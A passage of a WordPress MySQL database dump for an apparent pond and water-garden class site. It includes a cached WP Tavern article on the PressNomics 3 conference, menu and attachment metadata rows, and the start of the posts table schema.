for <a title=\"http://webdevstudios.com/\" href=\"http://webdevstudios.com/\">WebDevStudios</a>.</p>\n<p><strong>Ben Chan</strong></p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37978\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg?resize=1024%2C768\" alt=\"Envato Stats via Ben Chan\" /></a>Envato Stats via Ben Chan\n<p>Ben Chan is the Director of Growth and Revenue at <a title=\"http://market.envato.com/\" href=\"http://market.envato.com/\">Envato</a>. The statistics he shared confirm that Envato is a huge player in various markets such as WordPress themes, audio files, and plugins. His slides are not available online, but I archived a few stats using Twitter. “Note that the earnings are before Envato takes their cut.”</p>\n<ul>\n<li>In the first 30 days, the <a title=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\" href=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\">Automotive theme</a> on ThemeForest had 300+ sales generating over $15K in sales.</li>\n<li>In less than 10 months, the WPlus theme had over 4K+ sales.</li>\n<li>In 2014, Visual Composer was the best selling plugin on CodeCanyon. The second best product is built on top of it.</li>\n<li>Easy Social Share buttons plugin by Appscreo has over 6K+ sales on CodeCanyon.</li>\n<li>Of the top 50 selling WordPress themes in 2014, 67% are new to the list versus 2013.</li>\n<li>79% of themes describe themselves as responsive, but make up 93% of overall earnings.</li>\n<li>Only 4% of themes in the ThemeForest marketplace have earned less than $1K in their lifetime.</li>\n<li>Envato supports initiatives in the WordPress community. One example is <a title=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\" href=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\">funding John James Jacoby</a> to work on GlotPress, bbPress, and BuddyPress full-time for six months.</li>\n</ul>\n<p><strong>Selena Larson</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Helpful tips from <a href=\"https://twitter.com/selenalarson\">@selenalarson</a> on how startups can pitch, including getting known thru good comments <a href=\"https://twitter.com/hashtag/Pressnomics?src=hash\">#Pressnomics</a> <a href=\"http://t.co/c3hufKKspb\">pic.twitter.com/c3hufKKspb</a></p>\n<p>— Danny Sullivan (@dannysullivan) <a href=\"https://twitter.com/dannysullivan/status/558664527303041025\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p><a title=\"http://selenalarson.com/\" href=\"http://selenalarson.com/\">Selena Larson</a> who writes for <a title=\"http://www.dailydot.com/authors/selena-larson/\" href=\"http://www.dailydot.com/authors/selena-larson/\">the Daily Dot</a>, shared tips on how businesses can receive press by improving their pitches. I agreed with pretty much everything she said on the matter and hope those in attendance took notes. Here are a few highlights:</p>\n<ul>\n<li>Stop using jargon to pitch a product because no one talks like that.</li>\n<li>Describe your product, service, or business in two sentences or less.</li>\n<li>Balance your innovation with something that’s familiar. Don’t talk to reporters as if they’re investors because they’re not.</li>\n<li><a title=\"http://www.producthunt.com/\" href=\"http://www.producthunt.com/\">Product Hunt</a> is a good way to test the market or pitch a product without involving the press.</li>\n</ul>\n<p>As bonus material, be sure to read our guide on <a title=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\" href=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\">how to promote newly released plugins</a>.</p>\n<p><strong>Danny Sullivan</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37982\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg?resize=1024%2C768\" alt=\"SEO With Danny Sullivan\" /></a>SEO With Danny Sullivan\n<p>Danny Sullivan, who is a Founding Editor of <a title=\"http://searchengineland.com/author/danny-sullivan\" href=\"http://searchengineland.com/author/danny-sullivan\">Search Engine Land</a>, presented on the topic of SEO. It’s a topic I’ve stayed away from and don’t talk about much, but Sullivan’s presentation was not only entertaining, it was enlightening. He showed a brief history of the Google homepage and described why numerous claims of SEO being dead are false.</p>\n<p>The one thing I took away from his presentation is that SEO will never die, but continue to evolve. Because of Sullivan’s presentation, I’m going to open my mind to SEO instead of writing it off.</p>\n<p><strong>Chris Lema</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Things <a href=\"https://twitter.com/chrislema\">@chrislema</a> does daily <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/hashtag/gtd?src=hash\">#gtd</a> <a href=\"http://t.co/WIBAlTCTkW\">pic.twitter.com/WIBAlTCTkW</a></p>\n<p>— Remkus de Vries (@DeFries) <a href=\"https://twitter.com/DeFries/status/558765203836268546\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>The CTO and Chief Strategist at <a href=\"http://crowdfavorite.com/\">Crowd Favorite</a>, Chris Lema, is one of my favorite speakers. He knows how to tell a story and keep the audience engaged. For this presentation, Lema shared tips and disciplines for getting things done. My favorite tip from his session is to start the day writing a list of three things you need to get done. Getting 2-3 items finished each day builds confidence and provides a historical record of things that are done.</p>\n<p>His stance on putting family first is an important strategy I need to work on. So far, listing three things to accomplish each day is working. I feel better about myself and it’s helping me figure out when I’ve had a good day.</p>\n<p>The last session featured Joshua Strebel interviewing Matt Mullenweg on stage, but I’m going to dissect that session in a separate post.</p>\n<h2>A Lot of Fun</h2>\n<p>Not only are the Strebels great hosts, they donated over $10K of proceeds from the event to the <a title=\"http://www.curesearch.org/\" href=\"http://www.curesearch.org/\">CureSearch</a> for Children’s Cancer charity. If there’s a PressNomics 4 and you’re involved in the economics of WordPress, I highly encourage you to attend.</p>\n<p>My goal was to be a fly on the wall for as many conversations as possible and I feel like I’ve accomplished that goal. I wouldn’t be surprised if several strategic partnerships are announced in the next few months with PressNomics being the birth place of the conversation.</p>\n<p>If you can’t wait for PressNomics 4, consider attending <a title=\"http://prestigeconf.com/tickets/\" href=\"http://prestigeconf.com/tickets/\">Prestige Las Vegas</a>, NV, February 27-28th. Similar to PressNomics, it’s a conference focused on the business side of WordPress.</p>\n<p>Here are a few other photos from the event.</p>\n<a href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3#gallery-37944-1-slideshow\">Click to view slideshow.</a>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 06:00:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 09 Feb 2015 22:26:14 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"214577\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Mon, 09 Feb 2015 22:15:12 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20130522182132\";}','no'),(749,'_transient_timeout_dash_20494a3d90a6669585674ed0eb8dcd8f','1423563974','no'),(750,'_transient_dash_20494a3d90a6669585674ed0eb8dcd8f','<p><strong>RSS Error</strong>: A feed could not be found at http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://wpclass.thegammonpress.com/ed2goclass/. A feed with an invalid mime type may fall victim to this error, or SimplePie was unable to auto-discover it.. Use force_feed() if you are certain this URL is a real feed.</p>','no'); /*!40000 ALTER TABLE `wp_options` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_postmeta` -- DROP TABLE IF EXISTS `wp_postmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_postmeta` ( `meta_id` bigint(20) unsigned NOT NULL auto_increment, `post_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `post_id` (`post_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=330 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_postmeta` -- LOCK TABLES `wp_postmeta` WRITE; /*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */; INSERT INTO `wp_postmeta` VALUES (324,107,'_menu_item_object','custom'),(325,107,'_menu_item_target',''),(326,107,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6,6,'_edit_last','1'),(7,6,'_edit_lock','1371835546:1'),(8,6,'_wp_page_template','default'),(9,8,'_edit_last','1'),(10,8,'_edit_lock','1369848171:1'),(11,8,'_wp_page_template','default'),(323,107,'_menu_item_object_id','107'),(322,107,'_menu_item_menu_item_parent','0'),(321,107,'_menu_item_type','custom'),(15,11,'_edit_last','1'),(16,11,'_edit_lock','1372266986:1'),(19,14,'_edit_last','1'),(20,14,'_wp_page_template','default'),(21,14,'_edit_lock','1369848756:1'),(22,17,'_menu_item_type','post_type'),(23,17,'_menu_item_menu_item_parent','0'),(24,17,'_menu_item_object_id','6'),(25,17,'_menu_item_object','page'),(26,17,'_menu_item_target',''),(27,17,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(28,17,'_menu_item_xfn',''),(29,17,'_menu_item_url',''),(60,22,'_menu_item_type','post_type'),(31,18,'_menu_item_type','post_type'),(32,18,'_menu_item_menu_item_parent','17'),(33,18,'_menu_item_object_id','8'),(34,18,'_menu_item_object','page'),(35,18,'_menu_item_target',''),(36,18,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(37,18,'_menu_item_xfn',''),(38,18,'_menu_item_url',''),(59,21,'_wp_page_template','default'),(40,19,'_menu_item_type','post_type'),(41,19,'_menu_item_menu_item_parent','0'),(42,19,'_menu_item_object_id','14'),(43,19,'_menu_item_object','page'),(44,19,'_menu_item_target',''),(45,19,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(46,19,'_menu_item_xfn',''),(47,19,'_menu_item_url',''),(58,21,'_edit_last','1'),(61,22,'_menu_item_menu_item_parent','0'),(62,22,'_menu_item_object_id','21'),(63,22,'_menu_item_object','page'),(64,22,'_menu_item_target',''),(65,22,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(66,22,'_menu_item_xfn',''),(67,22,'_menu_item_url',''),(68,21,'_edit_lock','1370804237:1'),(69,23,'_edit_last','1'),(70,23,'_wp_page_template','default'),(71,24,'_menu_item_type','post_type'),(72,24,'_menu_item_menu_item_parent','0'),(73,24,'_menu_item_object_id','23'),(74,24,'_menu_item_object','page'),(75,24,'_menu_item_target',''),(76,24,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(77,24,'_menu_item_xfn',''),(78,24,'_menu_item_url',''),(79,23,'_edit_lock','1370116850:1'),(80,25,'_edit_last','1'),(81,25,'_wp_page_template','default'),(82,26,'_menu_item_type','post_type'),(83,26,'_menu_item_menu_item_parent','0'),(84,26,'_menu_item_object_id','25'),(85,26,'_menu_item_object','page'),(86,26,'_menu_item_target',''),(87,26,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(88,26,'_menu_item_xfn',''),(89,26,'_menu_item_url',''),(90,25,'_edit_lock','1370116869:1'),(91,27,'_edit_last','1'),(92,27,'_wp_page_template','default'),(93,28,'_menu_item_type','post_type'),(94,28,'_menu_item_menu_item_parent','0'),(95,28,'_menu_item_object_id','27'),(96,28,'_menu_item_object','page'),(97,28,'_menu_item_target',''),(98,28,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(99,28,'_menu_item_xfn',''),(100,28,'_menu_item_url',''),(101,27,'_edit_lock','1370116891:1'),(102,29,'_edit_last','1'),(103,29,'_edit_lock','1370116982:1'),(104,29,'_wp_page_template','default'),(105,31,'_edit_last','1'),(106,31,'_edit_lock','1370117088:1'),(107,31,'_wp_page_template','default'),(108,33,'_edit_last','1'),(109,33,'_edit_lock','1370117122:1'),(110,33,'_wp_page_template','default'),(111,35,'_edit_last','1'),(112,35,'_edit_lock','1370117163:1'),(113,35,'_wp_page_template','default'),(114,37,'_edit_last','1'),(115,37,'_edit_lock','1370117204:1'),(116,37,'_wp_page_template','default'),(117,39,'_edit_last','1'),(118,39,'_edit_lock','1370117244:1'),(119,39,'_wp_page_template','default'),(120,41,'_edit_last','1'),(121,41,'_edit_lock','1370117285:1'),(122,41,'_wp_page_template','default'),(123,43,'_edit_last','1'),(124,43,'_edit_lock','1370117313:1'),(125,43,'_wp_page_template','default'),(126,45,'_edit_last','1'),(127,45,'_edit_lock','1370117333:1'),(128,45,'_wp_page_template','default'),(129,47,'_edit_last','1'),(130,47,'_edit_lock','1370117379:1'),(131,47,'_wp_page_template','default'),(132,49,'_edit_last','1'),(133,49,'_edit_lock','1370117428:1'),(134,49,'_wp_page_template','default'),(135,51,'_menu_item_type','post_type'),(136,51,'_menu_item_menu_item_parent','17'),(137,51,'_menu_item_object_id','47'),(138,51,'_menu_item_object','page'),(139,51,'_menu_item_target',''),(140,51,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(141,51,'_menu_item_xfn',''),(142,51,'_menu_item_url',''),(144,52,'_menu_item_type','post_type'),(145,52,'_menu_item_menu_item_parent','17'),(146,52,'_menu_item_object_id','49'),(147,52,'_menu_item_object','page'),(148,52,'_menu_item_target',''),(149,52,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(150,52,'_menu_item_xfn',''),(151,52,'_menu_item_url',''),(153,53,'_menu_item_type','post_type'),(154,53,'_menu_item_menu_item_parent','22'),(155,53,'_menu_item_object_id','41'),(156,53,'_menu_item_object','page'),(157,53,'_menu_item_target',''),(158,53,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(159,53,'_menu_item_xfn',''),(160,53,'_menu_item_url',''),(162,54,'_menu_item_type','post_type'),(163,54,'_menu_item_menu_item_parent','22'),(164,54,'_menu_item_object_id','43'),(165,54,'_menu_item_object','page'),(166,54,'_menu_item_target',''),(167,54,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(168,54,'_menu_item_xfn',''),(169,54,'_menu_item_url',''),(171,55,'_menu_item_type','post_type'),(172,55,'_menu_item_menu_item_parent','22'),(173,55,'_menu_item_object_id','45'),(174,55,'_menu_item_object','page'),(175,55,'_menu_item_target',''),(176,55,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(177,55,'_menu_item_xfn',''),(178,55,'_menu_item_url',''),(180,56,'_menu_item_type','post_type'),(181,56,'_menu_item_menu_item_parent','24'),(182,56,'_menu_item_object_id','37'),(183,56,'_menu_item_object','page'),(184,56,'_menu_item_target',''),(185,56,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(186,56,'_menu_item_xfn',''),(187,56,'_menu_item_url',''),(189,57,'_menu_item_type','post_type'),(190,57,'_menu_item_menu_item_parent','24'),(191,57,'_menu_item_object_id','35'),(192,57,'_menu_item_object','page'),(193,57,'_menu_item_target',''),(194,57,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(195,57,'_menu_item_xfn',''),(196,57,'_menu_item_url',''),(198,58,'_menu_item_type','post_type'),(199,58,'_menu_item_menu_item_parent','24'),(200,58,'_menu_item_object_id','39'),(201,58,'_menu_item_object','page'),(202,58,'_menu_item_target',''),(203,58,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(204,58,'_menu_item_xfn',''),(205,58,'_menu_item_url',''),(207,59,'_menu_item_type','post_type'),(208,59,'_menu_item_menu_item_parent','26'),(209,59,'_menu_item_object_id','33'),(210,59,'_menu_item_object','page'),(211,59,'_menu_item_target',''),(212,59,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(213,59,'_menu_item_xfn',''),(214,59,'_menu_item_url',''),(234,63,'_wp_attached_file','2013/05/liner-folded.jpg'),(216,60,'_menu_item_type','post_type'),(217,60,'_menu_item_menu_item_parent','26'),(218,60,'_menu_item_object_id','31'),(219,60,'_menu_item_object','page'),(220,60,'_menu_item_target',''),(221,60,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(222,60,'_menu_item_xfn',''),(223,60,'_menu_item_url',''),(225,61,'_menu_item_type','post_type'),(226,61,'_menu_item_menu_item_parent','26'),(227,61,'_menu_item_object_id','29'),(228,61,'_menu_item_object','page'),(229,61,'_menu_item_target',''),(230,61,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(231,61,'_menu_item_xfn',''),(232,61,'_menu_item_url',''),(235,63,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:24:\"2013/05/liner-folded.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"liner-folded-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"marina_slider\";a:4:{s:4:\"file\";s:24:\"liner-folded-225x200.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"marina_post\";a:4:{s:4:\"file\";s:24:\"liner-folded-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(236,64,'_wp_attached_file','2013/05/preformed.jpg'),(237,64,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:297;s:6:\"height\";i:247;s:4:\"file\";s:21:\"2013/05/preformed.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"preformed-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"marina_slider\";a:4:{s:4:\"file\";s:21:\"preformed-297x200.jpg\";s:5:\"width\";i:297;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"marina_post\";a:4:{s:4:\"file\";s:21:\"preformed-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(238,65,'_wp_attached_file','2013/05/waterfall-slider.jpg'),(239,65,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:424;s:6:\"height\";i:283;s:4:\"file\";s:28:\"2013/05/waterfall-slider.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"waterfall-slider-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"waterfall-slider-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"marina_slider\";a:4:{s:4:\"file\";s:28:\"waterfall-slider-350x200.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"marina_post\";a:4:{s:4:\"file\";s:28:\"waterfall-slider-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(240,65,'_wp_attachment_image_alt','A waterfall makes an attractive addition to a water garden.'),(241,64,'_edit_lock','1370198337:1'),(242,71,'_edit_last','1'),(243,71,'_edit_lock','1370539437:1'),(244,71,'_wp_page_template','default'),(245,73,'_menu_item_type','post_type'),(246,73,'_menu_item_menu_item_parent','0'),(247,73,'_menu_item_object_id','71'),(248,73,'_menu_item_object','page'),(249,73,'_menu_item_target',''),(250,73,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(251,73,'_menu_item_xfn',''),(252,73,'_menu_item_url',''),(254,80,'_wp_attached_file','2013/06/125x125-live_koi.png'),(255,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:125;s:4:\"file\";s:28:\"2013/06/125x125-live_koi.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(256,81,'_wp_attached_file','2013/06/125x125-plants.png'),(257,81,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:125;s:4:\"file\";s:26:\"2013/06/125x125-plants.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(258,82,'_wp_attached_file','2013/06/125x125-pond_pkgs.png'),(259,82,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:125;s:4:\"file\";s:29:\"2013/06/125x125-pond_pkgs.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(260,83,'_wp_attached_file','2013/06/125x125-your_ad.png'),(261,83,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:125;s:4:\"file\";s:27:\"2013/06/125x125-your_ad.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(262,82,'_edit_lock','1371406960:1'),(263,83,'_edit_lock','1371407269:1'),(264,81,'_edit_lock','1371407382:1'),(265,80,'_edit_lock','1371407466:1'),(266,85,'_menu_item_type','post_type'),(267,85,'_menu_item_menu_item_parent','0'),(268,85,'_menu_item_object_id','84'),(269,85,'_menu_item_object','page'),(270,85,'_menu_item_target',''),(271,85,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(272,85,'_menu_item_xfn',''),(273,85,'_menu_item_url',''),(274,90,'_menu_item_type','post_type'),(275,90,'_menu_item_menu_item_parent','0'),(276,90,'_menu_item_object_id','89'),(277,90,'_menu_item_object','page'),(278,90,'_menu_item_target',''),(279,90,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(280,90,'_menu_item_xfn',''),(281,90,'_menu_item_url',''),(282,92,'_menu_item_type','post_type'),(283,92,'_menu_item_menu_item_parent','0'),(284,92,'_menu_item_object_id','91'),(285,92,'_menu_item_object','page'),(286,92,'_menu_item_target',''),(287,92,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(288,92,'_menu_item_xfn',''),(289,92,'_menu_item_url',''),(290,93,'_edit_last','1'),(291,93,'_edit_lock','1372009055:1'),(292,94,'_wp_attached_file','2013/06/american-pond-free-freedom-kit.gif'),(293,94,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:216;s:6:\"height\";i:147;s:4:\"file\";s:42:\"2013/06/american-pond-free-freedom-kit.gif\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:42:\"american-pond-free-freedom-kit-150x147.gif\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/gif\";}s:11:\"marina_post\";a:4:{s:4:\"file\";s:42:\"american-pond-free-freedom-kit-150x147.gif\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(294,94,'_edit_lock','1371408947:1'),(295,93,'_eshop_featured','Yes'),(296,93,'_eshop_product','a:8:{s:3:\"sku\";s:7:\"AP-1215\";s:8:\"products\";a:3:{i:1;a:4:{s:6:\"option\";s:4:\"8x11\";s:5:\"price\";s:6:\"799.00\";s:6:\"weight\";s:2:\"32\";s:9:\"saleprice\";s:0:\"\";}i:2;a:4:{s:6:\"option\";s:5:\"11x11\";s:5:\"price\";s:6:\"849.00\";s:6:\"weight\";s:2:\"34\";s:9:\"saleprice\";s:0:\"\";}i:3;a:4:{s:6:\"option\";s:5:\"11x16\";s:5:\"price\";s:6:\"899.00\";s:6:\"weight\";s:2:\"38\";s:9:\"saleprice\";s:0:\"\";}}s:11:\"description\";s:17:\"American Pond Kit\";s:8:\"shiprate\";s:1:\"F\";s:8:\"featured\";s:3:\"Yes\";s:4:\"sale\";s:2:\"no\";s:10:\"cart_radio\";s:1:\"0\";s:6:\"optset\";s:0:\"\";}'),(297,93,'_eshop_stock','1'),(299,97,'_edit_last','1'),(300,97,'_edit_lock','1372008968:1'),(301,98,'_wp_attached_file','2013/06/slider_1_image.jpg'),(302,98,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:246;s:4:\"file\";s:26:\"2013/06/slider_1_image.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"slider_1_image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"marina_slider\";a:4:{s:4:\"file\";s:26:\"slider_1_image-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"marina_post\";a:4:{s:4:\"file\";s:26:\"slider_1_image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(303,98,'_wp_attachment_image_alt','We have everything you need to build a water garden like this!'),(304,97,'_thumbnail_id','98'),(308,93,'_thumbnail_id','94'),(310,11,'_thumbnail_id','64'),(316,11,'_wp_old_slug','keeping-your-water-clear'),(327,107,'_menu_item_xfn',''),(328,107,'_menu_item_url','http://wpclass.thegammonpress.com/ed2goclass/'); /*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_posts` -- DROP TABLE IF EXISTS `wp_posts`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_posts` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `post_author` bigint(20) unsigned NOT NULL default '0', `post_date` datetime NOT NULL default '0000-00-00 00:00:00', `post_date_gmt` datetime NOT NULL default '0000-00-00 00:00:00', `post_content` longtext NOT NULL, `post_title` text NOT NULL, `post_excerpt` text NOT NULL, `post_status` varchar(20) NOT NULL default 